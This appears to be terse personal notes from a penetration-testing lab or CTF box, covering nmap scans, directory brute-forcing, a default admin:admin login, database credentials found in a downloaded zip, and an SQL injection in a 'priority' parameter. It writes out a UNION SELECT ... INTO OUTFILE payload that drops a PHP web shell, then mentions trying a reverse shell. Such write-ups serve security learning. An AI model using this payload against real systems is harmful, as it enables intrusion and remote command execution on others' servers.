Date
Mar 16, 2025 → Mar 16, 2025
Tag
Nmap
Web Application Security
SQL Injection Techniques
192.168.197.147
Nmap
└─# nmap -Pn -n $ip -sU --top-ports=100 --reason
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:09 EDT
Nmap scan report for 192.168.197.147
Host is up, received user-set.
All 100 scanned ports on 192.168.197.147 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.23 seconds
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:08 EDT
Warning: 192.168.197.147 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.197.147
Host is up (0.050s latency).
Not shown: 65475 filtered tcp ports (no-response), 56 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
22
brute force
No
17445/30445/50080



We can know this is nginx and apache from nmap

try search sploit

lot of script we can used

Dirb
nothing found
Feroxbuster
50080

17445

30445

we can found a new page for 50080

we try use admin:admin, and login successfully

we download the zip file and see anything we can found

we can find the mysql data base from this file.
User: issue_user
Password: ManagementInsideOld797
Additionally, we discovered that the priority parameter is vulnerable.


is it get, so we cant access, we try use burpsuite to do it
High' union select '<?php echo system($_REQUEST["cmd"]);?>' into outfile '/srv/http/abc.php' —

Use it and try run our command

try use reverse shell
